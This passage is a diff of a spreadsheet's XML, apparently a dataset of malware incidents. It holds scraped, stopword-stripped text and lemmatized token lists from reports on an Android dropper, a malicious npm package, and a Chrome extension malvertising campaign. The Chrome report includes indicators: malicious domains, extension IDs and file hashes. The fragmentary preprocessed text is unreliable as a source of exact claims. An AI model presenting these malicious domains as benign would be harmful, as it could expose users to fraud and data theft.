'device', 'unusable', 'androidtrojandropperagentumx', 'share', 'characteristic', 'variant', 'mobile', 'dropper', 'characteristic', 'receiver', 'service', 'name', 'receiver', 'name', 'service', 'name', 'name', 'generic', 'solid', 'correlation', 'fact', 'code', 'identical', 'match', 'difference', 'variable', 'name', 'discernible', 'variant', 'malware', 'chinese', 'character', 'variable', 'name', 'second', 'characteristic', 'share', 'string', 'code', 'string', 'library', 'file', 'comandroidgooglebridgelibimp', 'time', 'code', 'string', 'decode', 'base64', 'load', 'library', 'memory', 'dexclassloader', 'library', 'memory', 'piece', 'malware', 'androidtrojanhiddenad', 'reproduce', 'additional', 'malware', 'user', 'variant', 'hiddenad', 'mobile', 'device', 'addition', 'origin', 'noteworthy', 'mention', 'mobile', 'device', 'chinese', 'company', 'explicit', 'malcontent', 'maker', 'device', 'aware', 'chinese', 'current', 'resolution', 'uninstall', 'app', 'current', 'malwarebyte', 'user', 'consequence', 'wireless', 'update', 'critical', 'update', 'worth', 'tradeoff', 'uninstall', 'setting', 'pricey', 'paper', 'weight', 'offer', 'remediate', 'malware', 'blog', 'landscape', 'mobile', 'code', 'section', 'remediate', 'malware', 'blog', 'blog', 'malware', 'scourge', 'user', 'mobile', 'device', 'mobile', 'device', 'available', 'purchase', 'governmentfunded', 'program', 'lower', 'behavior', 'development', 'company', 'budget', 'user', 'safe', 'mobile', 'device', 'thousand', 'iphone', 'escape', 'maliciousness', 'governmentassisted', 'funding', 'purchase', 'device', 'price', 'malware', 'type', 'malwarefree', 'existence', 'malwarebyte', 'final', 'word', 'u683cl', 'actual', 'u683cl', 'hand', 'phone', 'solid', 'hand', 'sure', 'fast', 'mobile', 'device', 'capable', 'smart', 'phone', 'general', 'malware', 'device', 'good', 'option', 'budget', 'important', 'realize', 'many', 'report', 'budget', 'manufacture', 'malware', 'report', 'number', 'widespread', 'issue', 'citizen', 'lifeline', 'assistance', 'program', 'many', 'other', 'tight', 'budget', 'safe', 'correction', 'version', 'blog', 'model', 'correct', 'model', 'confusion', 'share', 'article', 'article', 'news', 'robocaller', 'local', 'phone', 'number', 'inflammatory', 'disturbing', 'content', 'hefty', 'fine', 'comment', 'news', 'social', 'medium', 'tracking', 'tool', 'meta', 'retire', 'social', 'medium', 'tracking', 'tool', 'awkward', 'timing', 'amount', 'important', 'election', 'year', 'comment', 'news', 'patch', 'critical', 'vulnerability', 'update', 'critical', 'vulnerability', 'attacker', 'sandbox', 'continue', 'comment', 'news', 'privacy', 'ransomware', 'van', 'customer', 'datum', 'breach', 'van', 'customer', 'fraud', 'attack', 'attack', 'comment', 'podcast', 'home', 'network', 'tiresome', 'worth', 'carey', 'parker', 'lock', 'code', 's05e07', 'week', 'lock', 'code', 'podcast', 'carey', 'parker', 'importance', 'process', 'home', 'network', 'comment', 'author', 'full', 'time', 'mobile', 'malware', 'part', 'time', 'endurance', 'athlete', 'world', 'traveler', 'nerdy', 'mobile', 'malware', 'contributor', 'center', 'podcast', 'cyberprotection', 'personal', 'window', 'company', 'contact', 'career', 'news', 'press', 'blog', 'scholarship', 'forum', 'small', 'business', 'business', 'large', 'enterprise', 'endpoint', 'protection', 'endpoint', 'detection', 'response', 'detection', 'response', 'partner', 'service', 'provider', 'program', 'reseller', 'sign', 'solution', 'digital', 'footprint', 'rootkit', 'scanner', 'scanner', 'virus', 'scanner', 'spyware', 'scanner', 'generator', 'freedom', 'circle', '12th', 'floor', 'hacking', 'ransomware', 'computer', 'virus', 'cybersecurity', 'info', 'informed', 'late', 'news', 'cybersecurity', 'sign', 'newsletter', 'computer', 'threat', 'email', 'address', 'privacy', 'accessibility', 'compliance', 'certification', 'vulnerability', 'disclosure', 'term', 'service', 'right', 'select', 'language']</t>
         </is>
       </c>
     </row>
@@ -3883,17 +3368,12 @@
       </c>
       <c r="C133" t="inlineStr">
         <is>
-          <t>sign join account sign currently accessing computing enterprise account already account please link sign problems access would like request individual access account please contact customer service team phone email email protected sign search computing search latest topics choose topic list diversity tech data analytics devops gdpr cloud infrastructure deskflix sustainability tech diversity tech research events whitepapers popular content data analytics cloud leadership strategy open source storage telecoms leaders rising stars featured content ondemand webinars identity access management research tech marketing entrylevel tech roles cloud sustainability authors stuart sumner john leonard allen penny horwood computing contributors computing resources english français deutsch espagnol italien code ethics marketing solutions global computing germany search search computing search join sign account sign currently accessing computing enterprise account already account please link sign problems access would like request individual access account please contact customer service team phone email email protected sign sign become computing member team removes malicious package caught leaking data unix systems kundaliya january read share package downloaded times developers team node package manager removed malicious javascript package present repository observed stealing sensitive data unix systems packag continue reading article join computing unlimited access realtime news analysis opinion technology industry receive important breaking news daily newsletter first hear events awards programmes join live member interviews leaders lounge’ chance burning tech questions answered access computing delta providing market intelligence research receive membersonly newsletter exclusive opinion pieces senior leaders join already computing member login previous article visa acquires fintech startup plaid 53bn next article travelex refuses comment whether paid ransom data back also like hacking cryptocurrency wallet maker ledger hacked hundreds thousands stolen ledger attributed exploit phishing attack targeting former employee december read hacking nsos pegasus spyware used hack exiled russian journalist galina timchenko media outlet moscow declared ‘undesirable’ september read technology tried chatgpt vulnerability fixes flaws complex generative alone experiment chatgpt found code fixes unusable introduced vulnerabilities july read read nvidia outlines strategies gpus kubernetes march read apple mseries vulnerability enables attackers purloin cryptographic keys macs march read getting work march read redis shifts dual sourceavailable licensing model march read fujitsu exposed client data keys passwords nearly year report march read sign newsletter best news stories features photos perfectly formed email newsletter asian tech roundup failure fujitsu plus china cracks knuckles allen march read epic games hacker isnt hacker describe criminal geniuses allen march read essentials lockbit load fought allen february read delta view business intrigued cautious leaders help solve talent crisis twice many think cost jobs cyber cloud automation leaders reveal spending priorities microsoft azure google cloud platform sustainable cloud platform contact marketing solutions channel company privacy settings terms conditions policies careers follow channel company emea borough high street london registered england wales company registration number</t>
+          <t>Malicious npm package leaked data from UNIX systems - 1337qq-js</t>
         </is>
       </c>
       <c r="D133" t="inlineStr">
         <is>
           <t>https://www.computing.co.uk/news/3085001/npm-unix-security</t>
-        </is>
-      </c>
-      <c r="E133" t="inlineStr">
-        <is>
-          <t>['sign', 'account', 'sign', 'enterprise', 'account', 'sign', 'problem', 'access', 'individual', 'access', 'account', 'contact', 'customer', 'service', 'team', 'phone', 'email', 'email', 'sign', 'search', 'computing', 'search', 'late', 'topic', 'topic', 'list', 'diversity', 'tech', 'datum', 'analytic', 'sustainability', 'tech', 'diversity', 'tech', 'research', 'event', 'whitepaper', 'popular', 'content', 'datum', 'analytic', 'cloud', 'leadership', 'strategy', 'open', 'source', 'storage', 'telecom', 'leader', 'star', 'content', 'ondemand', 'identity', 'access', 'management', 'research', 'tech', 'marketing', 'entrylevel', 'tech', 'role', 'cloud', 'sustainability', 'author', 'contributor', 'resource', 'ethic', 'marketing', 'solution', 'global', 'search', 'search', 'computing', 'search', 'join', 'sign', 'account', 'sign', 'enterprise', 'account', 'sign', 'problem', 'access', 'individual', 'access', 'account', 'contact', 'customer', 'service', 'team', 'phone', 'email', 'email', 'sign', 'sign', 'member', 'team', 'malicious', 'package', 'datum', 'system', 'share', 'package', 'time', 'developer', 'team', 'package', 'manager', 'malicious', 'javascript', 'package', 'present', 'repository', 'sensitive', 'datum', 'unix', 'system', 'packag', 'article', 'unlimited', 'access', 'realtime', 'news', 'analysis', 'opinion', 'technology', 'industry', 'important', 'news', 'daily', 'newsletter', 'event', 'award', 'programme', 'live', 'member', 'interview', 'leader', 'chance', 'tech', 'question', 'access', 'delta', 'market', 'intelligence', 'research', 'newsletter', 'exclusive', 'opinion', 'piece', 'senior', 'leader', 'member', 'login', 'previous', 'article', 'plaid', 'next', 'article', 'comment', 'ransom', 'datum', 'cryptocurrency', 'wallet', 'maker', 'ledger', 'hundred', 'thousand', 'ledger', 'phishing', 'attack', 'former', 'employee', 'nsos', 'hack', 'russian', 'journalist', 'undesirable', 'read', 'technology', 'chatgpt', 'vulnerability', 'fix', 'complex', 'generative', 'alone', 'experiment', 'chatgpt', 'code', 'fix', 'unusable', 'vulnerability', 'strategy', 'mserie', 'vulnerability', 'attacker', 'cryptographic', 'key', 'work', 'redis', 'shift', 'sourceavailable', 'licensing', 'model', 'client', 'datum', 'key', 'password', 'year', 'report', 'sign', 'newsletter', 'good', 'news', 'story', 'photo', 'email', 'newsletter', 'asian', 'tech', 'roundup', 'failure', 'fujitsu', 'allen', 'game', 'hacker', 'hacker', 'criminal', 'genius', 'allen', 'read', 'essential', 'lockbit', 'load', 'view', 'business', 'cautious', 'leader', 'talent', 'crisis', 'many', 'cost', 'job', 'cyber', 'automation', 'leader', 'spending', 'priority', 'platform', 'sustainable', 'cloud', 'platform', 'contact', 'marketing', 'solution', 'channel', 'company', 'privacy', 'setting', 'term', 'condition', 'policy', 'career', 'channel', 'company', 'company', 'registration', 'number']</t>
         </is>
       </c>
     </row>
@@ -3908,15 +3388,14 @@
           <t>npm, PyPi, RubyGems.org</t>
         </is>
       </c>
-      <c r="C134" t="inlineStr"/>
+      <c r="C134" t="inlineStr">
+        <is>
+          <t>Six researchers from Georgia Tech (last author is Wenke Lee) build an analytical pipeline to analyze PyPI, Npm, and rubygems for malware. They identify 278 confirmed malware packages, including three with over 100K downloads, but do not provide a list of compromised packages.</t>
+        </is>
+      </c>
       <c r="D134" t="inlineStr">
         <is>
           <t>https://arxiv.org/pdf/2002.01139.pdf</t>
-        </is>
-      </c>
-      <c r="E134" t="inlineStr">
-        <is>
-          <t>[]</t>
         </is>
       </c>
     </row>
@@ -3933,17 +3412,12 @@
       </c>
       <c r="C135" t="inlineStr">
         <is>
-          <t>skip navigation blog docs support documentation getting started essentials edition remote access resources events webinars ebooks videos support support users support admins additional support information admin login product product simple tools complex needs connect protect employees business partners customers identitypowered explore products work features business needs variety plans several price points small medium businesses desktop mobile access protection basic reporting secure single signon enterprise smallmedium business features plus adaptive access policies greater device visibility plus advanced device insights remote access solutions federal government fedramp authorized endtoend fips compliant streamlined solutions state local government meet compliance objectives frictionfree compare editions ready capabilities provides secure access application broad range capabilities multifactor authentication verify identities users remote access provide secure access onpremise applications device trust ensure devices meet standards single signon provide secure access single dashboard adaptive access policies block grant access based users role location explore demos contact solutions solutions secure access variety industries cases duo’s customizable easy simple making perfect solution wide range industries explore solutions industry provides secure access variety industries projects companies education higher education finance healthcare legal retail technology federal government state local government meeting goals whether youre considering bigpicture strategy like zero trust want address specific like phishing attacks covered access management tools policy controls ensures right users access applications resources right conditions zero trust zero trust model establishes trust users devices authentication continuous monitoring passwordless duos comprehensive access sets stage userfriendly passwordfree multifactor authentication phishing prevention secure workforce phishing attacks strong multifactor authentication device trust riskbased authentication duo’s dynamic solution detects responds potential signals secure trusted users frustrate attackers explore demos contact strong doesnt sacrifice productivity platform integrates across entire ecosystem every user every device exceptions choose delivers peace mind strong increased productivity unmatched value speed reduce friction automate processes endusers administrators focus time moving business forward next level continues pioneer mfaapproaches keep business step ahead next protection productivity riskbased authentication reduces burden placed users verify identity quickly back task hand complete coverage close perimeter bring every user every device secure roof explore customer stories provides secure access variety industries projects companies explore demos click instant demos explore features part cisco find make global resilience easier ever explore demos contact pricing blog docs support documentation getting started essentials edition remote access resources events webinars ebooks videos support support users support admins additional support information admin login blog docs support documentation getting started essentials edition remote access resources events webinars ebooks videos support support users support admins additional support information admin login search contact sales free trial contact sales free trial back index researchers partner chrome take browser extension fraud network affecting millions users jamila kaya jacob rickerd jamila kaya independent researcher bumblebreaches jacob rickerd senior engineer crxpert introduction campaign malvertising rise behavior turning back clock crxcavator brighter future ahead conclusion indicator index introduction cisco’s released crxcavator automated chrome extension assessment tool free last year order reduce risk chrome extensions present organizations enable others build research create safer chrome extension ecosystem perfect example research hoped facilitate researcher jamila kaya bumblebreaches used crxcavator uncover large scale campaign copycat chrome extensions infected users exfiltrated data malvertising attempting evade fraud detection google chrome store jamila google worked together ensure extensions others like promptly found removed campaign jamila contacted variety chrome extensions identified operating manner initially seemed legitimate upon investigation found infect users’ browsers exfiltrate data part larger campaign extensions commonly presented offering advertising service jamila discovered part network copycat plugins sharing nearly identical functionality collaboration able take dozen extensions utilize crxcavatorio identify matching patterns across million users escalate concerns google google receptive responsive report report submitted worked validate findings went fingerprint extensions allowed google search entire chrome store corpus discover remove related extensions appreciate work research community alerted extensions store violate policies take action incidents training material improve automated manual analyses” said google spokesperson regular sweeps find extensions using similar techniques code behaviors take extensions violate policies” malvertising rise increasingly malicious actors legitimate internet activity obfuscate exploit droppers command control schemas popular utilize advertising cookies redirects therein control callbacks evade detection technique called “malvertising” become increasingly common infection vector jamilas experience still hard detect today despite prominent years malvertising often occurs within programs acting vehicle multiple forms fraudulent activity including adfraud data exfiltration phishing monitoring exploitation alternatively also emerges multipart malicious campaigns involve advertising collection defraudment evident recent writeups independent malvertising multipart malvertising campaigns including examples campaign recent fake jquery campaign prominence malvertising attack vector continue rise long trackingbased advertising remains ubiquitous particularly users remain underserved protection mechanisms behavior browser extensions known weak point individual privacy potential misuse general guise helpful applications case reported chrome extension creators specifically made extensions obfuscated underlying advertising functionality users done order connect browser clients command control architecture exfiltrate private browsing data without users knowledge expose user risk exploit advertising streams attempt evade chrome store’s fraud detection mechanisms research crxcavators analysis general help understand architecture operation malicious extensions question extensions installed system data answer time break occurs jamila mapped functions architecture singular actor utilizing least last years potential activity dating back early 2010’s jamila compared findings crxcavatorio take note additional patterns main site referenced description always exact name plugin “com” contact information support information explicitly listed extensions either plugins almost ratings source code plugins nearly identical substantial differences source code names functions much larger number similar plugins services it’s likely single change function names reduces similarity plugins enough avoid detection mechanisms similarity shown comparing code plugins mapstrek promos crusharcade advertisements code left crusharcade references sites adjust reference “ca” network crush arcade name adapttimetablejs right references “mt” mapstrek called additionthreadjs version seen incredibly similar notation code versioning plugins always four sections length level permissions requested plugin similarly high identical allowing access large amount data browser addition external sites contacted identical plugins involved exception plugin “front” site users browser plugin call site referenced name mapstrekdotcom arcadeyumdotcom like partial list document regular intervals receive instruction whether uninstall sandboxes report trying navigate plugin sites immediately takes gdprcountryrestrictiondotcom site impacted users taken could indicate plugin attempting appear legitimate obfuscate behavior sandboxes impacted user’s machine makes contact plugin site move onto hardcoded “acctrdomains” referenced code three used almost always first series dtsincedotcom operate command control domains user’s host regularly checks asynchronous interval domains receive instructions locations upload data domain feed lists advertisements future redirects example communications host receives command sites pulled memory impacted host impacted host directions three operations upload requested data update config sent redirection stream upload made datadotmultitextdotcom identified data exchange domain transactions data exchange includes limited various usage time idle activity tracking browser activity statistics sometimes mimicry advertising course without general consent config update seems occur either control domains dmnsgdotcom pulled settlesignaljs impacted host primary malicious activity fraud occurs redirection streams host sites owned actor listed screenshots named similarly almost hosted general variants words like “randomdomain” without vowels easily recognized humancreated words obfuscated machine operations user regularly receives redirector domains created batches multiple earlier domains created hour operate receiving signal host sending series streams subsequently legitimate illegitimate listed “end domains” section iocs though numerous list large portion benign streams leading macy’s dell best differentiates malvertising fraud rather legitimate advertising large volume content shown fact user many majority fact malicious thirdparty actors actively using streams redirect user malware phishing evidenced “end domains” sites sponsergiftdotpro usapremiumclub associated “usa” sites jenrx2udotcom 3f6i9dotcom could considered legitimate however percent time redirect occurs streams reference malicious site additionally malicious domains occur multiple times disparate users jamila’s research never seen occur plugins streams primary intention plugin point still cycle redirection streams order generate revenue users exposed additional risk infection phishing redirects volume redirects oscillate point user regularly check plugins continues collect data generate internal revenue user’s machine largely undetected investigating components owned actor appears though ultimate registrant always obfuscated seem actively maintain plugin sites control sites redirector sites upload config sites controlled directly actor worth noting also redirect gdprcountryrestrictiondotcom sandboxes time discovery intelligence vendors explicitly categorized part infrastructure malicious phishing exception state missouri listed dtsincedotcom phishing without context beginning year hunting open resources jamila also able discover direct malware tied plugin sites likely operating different design function user directly tied mapstrekdotcom arcadeyumdotcom lacking iocs plugin architecture contain similarities including references domains hybridanalysis sandbox arcadeyum malware sample report hybridanalysis sandbox mapstrek malware sample report additionally searching indicators proprietary sandboxes pulled multiple instances malware tied arcadeyum site well redirector domains hashes found “68707cfc2c7bfe721e22f681c86480c012ce7b28f442c2e0090fde95663b6f13” classified virustotal related gamevance softwareadware tiein well plugin proliferation suggests potentially actor operating continued grow avoiding detection instances impacted users trace gamevance arcade software found visited particular association tangential turning back clock based upon jamila’s observation time research actor active least eight months since january grown rapidly activity thereafter especially march june dozens variant plugins released domains infrastructure stood monthly possible actor active much longer malware domains associated traffic registered multiple portions architecture support plugin network created month components redirector domains released chunks instruction domains seem created june likely start particular behavior redirector domains created various times multiple created pairs around similar times redirector domains created recently midapril recently redirector domains increasingly leased nonaws hosters whereas early domains almost exclusively hosted recent domains also variance seem left level information registrar fields redirector domain updated march left nonobfuscated email addresses registration fields reverse lookup indicates registrations many potential phishing sites enough investigation done fully attribute crxcavator excited able work jamila findings much data able gathered using crxcavator duo’s free automated chrome extension assessment tool duo’s mission always democratize felt different chrome extensions crxcavator empowers organizations assess potential risks extension pose decide whether allow installed users’ endpoints browserextension expert anyone crxcavator empower organizations size stay secure learn tool check crxcavator release blog post brighter future ahead google implemented user data privacy policy secure handling requirements guidelines require extensions handle user data privacy policy gain consent user minimum required amount permissions help enforcement google also implemented developer data protection reward program bounties people find extensions violating policy combined upcoming manifest steps demonstrate google taking user privacy seriously making great strides ensure user base conclusion outcome jamila’s research collaboration google demonstrates increasing real world risk chrome extensions utility crxcavator tool researchers finding vulnerabilities like collectively identified chrome extensions infected users’ browsers consequently removed store million users affected indicates scale browser extensions used attack vector impact users part good hygiene recommend users regularly audit extensions installed remove ones longer report ones recognize mindful access easily accessible information extensions help keep enterprises users safe indicator index type mapstrekcom plugin domain mapsscoutcom plugin domain deluxequizcom plugin domain gameschillcom plugin domain packtrackpluscom plugin domain mapsvoyagecom plugin domain mapsfrontiercom plugin domain yoyoquizcom plugin domain recipeallycom plugin domain supersimpletoolscom plugin domain playzizcom plugin domain jumboquizcom plugin domain mapspilotcom plugin domain expressdirectionscom plugin domain freeweatherappcom plugin domain gofreeradiocom plugin domain lovetestprocom plugin domain playthundercom plugin domain quizflavorcom plugin domain gamedaddio plugin domain packagetrakcom plugin domain froovr plugin domain classifiedsnearmecom plugin domain gamezookscom plugin domain quicknewspluscom plugin domain playpopgamescom plugin domain easytoolonlinecom plugin domain greatarcadehitscom plugin domain crusharcadecom plugin domain promediaconvertercom plugin domain arcadeyumcom plugin domain dtsincecom control domain comvngcom control domain elsticsrcom control domain gdprcountryrestrictioncom deterministic domain rowamscom redirector domain glaulbcom redirector domain rodmndcom redirector domain arpdmncom redirector domain fulamzcom redirector domain rdrdmncom redirector domain rnddmncom redirector domain srvnmdomcom redirector domain rdcnewcom redirector domain rndmdmncom redirector domain amdawscom redirector domain fmtawscom redirector domain hometailercom redirector domain rdrawscom redirector domain srvtopcom redirector domain globlbcom redirector domain frshdmncom redirector domain rawdwscom redirector domain reddmncom redirector domain reqawscom redirector domain gleglbcom redirector domain newdmncom redirector domain gluedccom redirector domain tmnthocom redirector domain srvalgocom redirector domain wrrpamcom redirector domain dmnamzcom redirector domain rddmnscom redirector domain multiextcom local storage exfil domain ticsynccom domain usavisitorcocom domain usavisitorcentercom domain sponsergiftpro domain 3f6i9com domain usaconsumerperkscom domain rewardsecurecom domain jenrx2ucom domain runslincom domain securedgiftcom domain usasecureconsumercom domain usavisitorrewardscom domain usavisitorsorg domain usapremiumclubcom domain usaperkscentercom domain usagiftscentercom domain premiumclubusacom domain usaclubvip domain packagetrak promos plugin name promediaconverter promotions plugin name easytoolonline promos plugin name crusharcade plugin name greatarcadehits plugin name arcadefrontier plugin name mapsfrontier advertising plugin name supersimpletools promos plugin name advertisements arcadeyum plugin name packtrackplus promos plugin name easytoolonline promos plugin name playpopgames plugin name quicknewsplus promos plugin name gamezooks advertisements plugin name packtrackplus promotions plugin name packtrackplus promotions plugin name mapsfrontier advertisement offers plugin name expressdirections promos plugin name mapstrek promos plugin name classifiedsnearme promos plugin name mapstrek promos plugin name classifiedsnearme promos plugin name expressdirections promos plugin name mapstrek offers plugin name mapsvoyage promotions plugin name freeweatherapp promotions plugin name earthviewdirections promotions plugin name mapsfrontier advertisements plugin name arcadecookie offers plugin name recipeally promos plugin name mapstrek promotions plugin name offers mapsfrontier plugin name gameschill plugin name packtrackplus promotions plugin name mapsvoyage plugin name advertising mapsfrontier plugin name playziz advertisements plugin name advertising offers mapsvoyage plugin name mapsfrontier advertising offers plugin name freeweatherapp promos plugin name freeweatherapp advertisement offers plugin name expressdirections plugin name yoyoquiz promotions plugin name mapsvoyage advertising plugin name mapspilot offers plugin name gofreeradio promos plugin name advertising offers freeweatherapp plugin name advertisement offers quizkicks plugin name mapsvoyage plugin name jumboquiz advertising plugin name mapsscout advertising offers plugin name deluxequiz advertising plugin name supersimpletools promos plugin name advertising mapspilot plugin name advertisements mapsscout plugin name packagetrak promos plugin name offers froovr plugin name packagetrak promos plugin name gamedaddio marketing plugin name dearquiz advertising plugin name offers mapsscout plugin name yoyoquiz advertisements plugin name advertisment offers gamedaddio plugin name quizflavor advertising plugin name advertisements quizdiamond plugin name quizpremium advertisements plugin name couponrockstar offers plugin name mapsfrontier promos plugin name advertising offers mapspilot plugin name playthunder offers plugin name lovetestpro offers plugin name oanbpfkcehelcjjipodkaafialmfejmi plugin lhfibgclamcffnddoicjmoopmgomknmb plugin ilcbbngkolbclhlildojhgjdbkkehfia plugin pnhjnmacgahapmnnifmneapinilajfol plugin ocifcogajbgikalbpphmoedjlcfjkhgh plugin peglehonblabfemopkgmfcpofbchegcl plugin aaeohfpkhojgdhocdfpkdaffbehjbmmd plugin lidnmohoigekohfmdpopgcpigjkpemll plugin jmbmildjdmppofnohldicmnkojfhggmb plugin jdoaaldnifinadckcbfkbiekgaebkeif plugin ogjfhmgoalinegalajpmjoliipdibhdm plugin lebmkjafnodbnhbahbgdollaaabcmpbh plugin gjammdgdlgmoidmdfoefkeklnhmllpjp plugin kdkpllchojjkbgephbbeacaahecgfpga plugin jaehldonmiabhfohkenmlimnceapgpnp plugin pmhlkgkblgeeigiegkmacefjoflennbn plugin ofdfbeanbffehepagohhengmjnhlkich plugin mjchijabihjkhmmaaihpgmhkklgakinl plugin poppendnaoonepbkmjejdfebihohaalo plugin eogoljjmndnjfikmcbmopmlhjnhbmdda plugin gdnkjjhpffldmfljpbfemliidkeeecdj plugin gelcjfdfebnabkielednfoogpbhdeoai plugin ofpihhkeakgnnbkmcoifjkkhnllddbld plugin pjjghngpidphgicpgdebpmdgdicepege plugin nchdkdaknojhpimbfbejfcdnmjfbllhj plugin blcfpeooekoekehdpbikibeblpjlehlh plugin looclnmoilplejheganiloofamfilbcd plugin oehimkphpeeeneindfeekidpmkpffkgc plugin eebbihndkbkejmlgfoofigacgicamfha plugin faopefnnleiebimhkldlplkgkjpbmcea plugin obcfkcpejehknjdollnafpebkcpkklbl plugin jepocknhdcgdmbiodbpopcbjnlgecdhf plugin dehhfjanlmglmabomenmpjnnopigplae plugin ekijhekekfckmkmbemiijdkihdibnbgh plugin pjpjefgijnjlhgegceegmpecklonpdjp plugin nlhocomjnfjedielocojomgfldbjmdjj plugin opooaebceonakifaacigffdhogdgfadg plugin ojofdaokgfdlbeomlelkiiipkocneien plugin gpaaalbnkccgmmbkendiciheljgpdhob plugin almfnpjmjpnknlgpipillhfmchjikkno plugin eeacchjlmkcleifpppcjbmahcnlihamj plugin lojgkcienjoiogbfkbjiidpfnabhkckf plugin gkemhapalomnipjhminflfhjcjehjhmp plugin icolkoeolaodpjogekifcidcdbgbdobc plugin abjbfhcehjndcpbiiagdnlfolkbfblpb plugin bbjilncoookdcjjnkcdaofiollndepla plugin igpcgjcdhmdjhdlgoncfnpkdipanlida plugin nfhpojfdhcdmimokleagkdcbkmcgfjkh plugin jfnlkmaledafkdhdokgnhlcmeamakham plugin dibjpjiifnahccnokciamjlfgdlgimmn plugin fjclfmhapndgeabdcikbhemimpijpnah plugin jpnamljnefhpbpcofcbonjjjkmfjbhdp plugin iggmbfojpkfikoahlfghaalpbpkhfohc plugin fkllfgoempnigpogkgkgmghkchmjcjni plugin dealfjgnmkibkcldkcpbikenmajlglmc plugin abghmipjfclfpgmmelbgolfgmhnigbma plugin dcbfmglfdlgpnolgdjoioeocllioebpe plugin obmbmalbahpfbckpcfbipooimkldgphm plugin gbkmkgfjngebdcpklbkeccelcjaobblk plugin ehibgcefkpbfkklbpahilhicidnhiboc plugin gmljddfeipofcffbhhcpohkegndieeab plugin dajgdhiemoaecngkpliephmheifopmjb plugin fdbmoflclpmkmeobidcgmfamkicinnlg plugin obbfndpanmiplgfcbeonoocobbnjdmdc plugin lgljionbhcfbnpjgfnhhoadpdngkmfnh plugin ddenjpheppdmfimooolgihimdgpilhfo plugin bblkckhknhmalchbceidkmjalmcmnkfa plugin fhkmacopackahlbnpcfijgphgoimpggb plugin eohnfgagodblipmmalphhfepaonpnjgk plugin emkkigmmpfbjmikfadmfeebomholoikg plugin fekjbjbbdopogpamkmdjpjicapclgamj plugin ff6f8c062bb9b4b66de6929ff2921f5fd9eff4b013b32842e9e7e51f609c1f0f sha256 hash 0c1a8ca8ad72db5c0c3babc8d2488cc4ac7815d8158d170c5fd4c1056cd7dd87 sha256 hash 68707cfc2c7bfe721e22f681c86480c012ce7b28f442c2e0090fde95663b6f13 sha256 hash maps plugin name pattern promos plugin name pattern pack plugin name pattern plus plugin name pattern plugin name pattern advertising plugin name pattern offers plugin name pattern quiz plugin name pattern marketing plugin name pattern promotions plugin name pattern advertisements plugin name pattern sczp redirector pattern fzsp redirector pattern search product capabilities mobile methods single signon device trust remote access passwordless zero trust customer cases state local government federal government enterprise small medium business editions partnerships editions free essentials advantage premier ready partner partnership program technology partner program managed service provider solutions provider docs support docs getting started admin overview user guide docs editions docs integrations support support system status support users user guides mobile mobile mobile android support administrators knowledge base community forum resources resources careers news press events demand events webinars ebooks videos interactive demos infosec glossary follow international resources select language français deutsch español select language français deutsch español terms service privacy statement privacy data sheet copyright dispute policy service level agreement response business continuity covid19 cookies</t>
+          <t>500 Chrome extensions were found to infect users' browsers and exfiltrate data as part of a larger campaign.</t>
         </is>
       </c>
       <c r="D135" t="inlineStr">
         <is>
           <t>https://duo.com/labs/research/crxcavator-malvertising-2020</t>
-        </is>
-      </c>
-      <c r="E135" t="inlineStr">
-        <is>
-          <t>['navigation', 'blog', 'doc', 'documentation', 'essential', 'remote', 'access', 'resource', 'event', 'webinar', 'ebook', 'video', 'support', 'user', 'admin', 'additional', 'support', 'information', 'admin', 'login', 'product', 'product', 'simple', 'tool', 'complex', 'protect', 'employee', 'business', 'partner', 'customer', 'product', 'work', 'business', 'variety', 'plan', 'several', 'price', 'point', 'small', 'medium', 'business', 'mobile', 'access', 'protection', 'basic', 'reporting', 'single', 'signon', 'enterprise', 'business', 'feature', 'adaptive', 'access', 'policy', 'great', 'device', 'visibility', 'advanced', 'device', 'insight', 'remote', 'access', 'solution', 'federal', 'government', 'fedramp', 'endtoend', 'compliant', 'streamlined', 'solution', 'state', 'local', 'government', 'compliance', 'objective', 'edition', 'ready', 'capability', 'secure', 'access', 'application', 'broad', 'range', 'capability', 'multifactor', 'authentication', 'identity', 'user', 'remote', 'access', 'secure', 'access', 'onpremise', 'application', 'device', 'trust', 'device', 'standard', 'single', 'signon', 'secure', 'access', 'single', 'dashboard', 'adaptive', 'access', 'policy', 'grant', 'access', 'user', 'role', 'location', 'contact', 'solution', 'solution', 'access', 'variety', 'industry', 'case', 'duo', 'customizable', 'easy', 'simple', 'perfect', 'solution', 'wide', 'range', 'industry', 'solution', 'industry', 'secure', 'access', 'variety', 'industry', 'company', 'high', 'education', 'finance', 'healthcare', 'legal', 'retail', 'technology', 'federal', 'government', 'state', 'local', 'government', 'meeting', 'goal', 'bigpicture', 'strategy', 'trust', 'specific', 'phishing', 'attack', 'access', 'management', 'tool', 'policy', 'control', 'right', 'user', 'application', 'resource', 'right', 'condition', 'trust', 'trust', 'model', 'trust', 'user', 'authentication', 'continuous', 'passwordless', 'duos', 'comprehensive', 'access', 'set', 'userfriendly', 'passwordfree', 'multifactor', 'authentication', 'phishing', 'prevention', 'secure', 'workforce', 'phishing', 'attack', 'strong', 'multifactor', 'authentication', 'device', 'trust', 'authentication', 'duo', 'dynamic', 'solution', 'potential', 'signal', 'user', 'frustrate', 'attacker', 'contact', 'strong', 'productivity', 'platform', 'entire', 'ecosystem', 'user', 'device', 'exception', 'peace', 'mind', 'productivity', 'unmatched', 'value', 'speed', 'friction', 'automate', 'process', 'enduser', 'administrator', 'time', 'business', 'next', 'level', 'pioneer', 'mfaapproache', 'business', 'step', 'next', 'protection', 'productivity', 'authentication', 'burden', 'user', 'identity', 'task', 'hand', 'complete', 'coverage', 'close', 'perimeter', 'user', 'device', 'secure', 'roof', 'customer', 'story', 'secure', 'access', 'variety', 'industry', 'project', 'company', 'instant', 'demos', 'explore', 'part', 'cisco', 'global', 'resilience', 'contact', 'pricing', 'blog', 'doc', 'documentation', 'essential', 'remote', 'access', 'resource', 'event', 'webinar', 'ebook', 'video', 'support', 'user', 'admin', 'additional', 'support', 'information', 'admin', 'login', 'blog', 'doc', 'documentation', 'essential', 'remote', 'access', 'resource', 'event', 'webinar', 'ebook', 'video', 'support', 'user', 'admin', 'additional', 'support', 'information', 'admin', 'login', 'search', 'contact', 'sale', 'free', 'trial', 'contact', 'sale', 'free', 'trial', 'back', 'index', 'researcher', 'partner', 'chrome', 'browser', 'extension', 'fraud', 'network', 'million', 'user', 'researcher', 'bumblebreache', 'senior', 'engineer', 'crxpert', 'introduction', 'campaign', 'malvertising', 'rise', 'behavior', 'clock', 'crxcavator', 'bright', 'future', 'ahead', 'conclusion', 'index', 'introduction', 'crxcavator', 'chrome', 'extension', 'assessment', 'tool', 'free', 'last', 'year', 'order', 'risk', 'chrome', 'extension', 'present', 'organization', 'other', 'research', 